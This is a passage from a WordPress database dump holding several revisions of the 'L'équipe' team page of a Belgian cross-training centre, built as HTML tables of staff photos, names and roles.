(137, 1, '2013-06-16 15:02:45', '2013-06-16 15:02:45', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-06-16 15:02:45', '2013-06-16 15:02:45', '', 20, 'http://www.crosstrainingcenter.be/?p=137', 0, 'revision', '', 0),
(241, 1, '2013-07-03 19:36:43', '2013-07-03 19:36:43', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"180\" height=\"235\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"180\" height=\"233\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:36:43', '2013-07-03 19:36:43', '', 20, 'http://www.crosstrainingcenter.be/?p=241', 0, 'revision', '', 0),
(138, 1, '2013-06-16 15:03:45', '2013-06-16 15:03:45', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table></div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table></div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table></div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table></div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table></div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table></div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table></div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-06-16 15:03:45', '2013-06-16 15:03:45', '', 20, 'http://www.crosstrainingcenter.be/?p=138', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(140, 1, '2013-06-16 15:07:01', '2013-06-16 15:07:01', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\n\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Baptiste Pitsaer</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Anaïs Gosset</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-06-16 15:07:01', '2013-06-16 15:07:01', '', 20, 'http://www.crosstrainingcenter.be/?p=140', 0, 'revision', '', 0),
(139, 1, '2013-06-16 15:04:18', '2013-06-16 15:04:18', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Daimen Pierrard</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-06-16 15:04:18', '2013-06-16 15:04:18', '', 20, 'http://www.crosstrainingcenter.be/?p=139', 0, 'revision', '', 0),
(141, 1, '2013-06-16 15:07:42', '2013-06-16 15:07:42', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full 